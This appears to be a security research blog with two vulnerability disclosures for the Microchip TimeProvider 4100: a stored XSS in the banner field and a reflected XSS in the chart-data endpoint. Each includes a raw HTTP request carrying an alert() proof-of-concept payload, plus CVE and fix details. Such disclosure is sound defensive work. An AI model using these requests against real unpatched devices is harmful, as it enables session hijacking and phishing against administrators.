Wednesday, October 16, 2024

CVE-2024-43687: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER DEVICE (BANNER) - STORED XSS


Carrying on with the analysis of the "TimeProvider 4100 grandmaster device", it was possible to find out a Stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. 

TimeProvider 4100 Grandmaster Device

The embedded webserver does not perform input sanitization on the "txtcustom" parameter and saves such value inside the database. Users able to visit the device web administration interface will find out the malicious JavaScript payload included in the related server responses and furthermore, it will be executed on the victim's browser. 
The following image shows an example of a request containing the malicious JavaScript payload:



Request RAW:

POST /bannerconfig HTTP/1.1
Host: 192.168.1.1
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://192.168.1.1
Referer: https://192.168.1.1/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"
<img src=a onerror=alert(1)>
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--
# End


Payload execution on the victim’s browser:




By performing a login operation into the device SSH service, it is possible to view the injected malicious Javascript payload. Following an example of such connection:




Conclusion:

A threat actor that exploits this vulnerability is able to perform phishing attacks and session hijacking compromising in this way the confidentiality, integrity and availability of the device.

Reporting Information:


CVE Identifier: CVE-2024-43687
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.






Tuesday, October 08, 2024

CVE-2024-43686 - MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS


Coming across the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device. 

TimeProvider 4100 Grandmaster Device

There was a particular parameter channelId that resulted in reflecting its content in the embedded web server responses. Specifically, the request that deals with updating the charts.

Going forward in this way, after several attempts, it was possible to inject a JavaScript payload between <scripts> tags, resulting in a Reflected Cross-site Scripting Vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:





Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd


Payload execution on the victim’s browser:




Conclusion:


An unauthenticated user can insert JavaScript snippets in channelId parameter on the specified POST request to the web resource get_chart_data. In the worst case, attackers will be able to perform privileged operations by stealing administrative user’s session or gain access to sensitive information belonging to the user.  


Reporting Information:


CVE Identifier: CVE-2024-43686
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.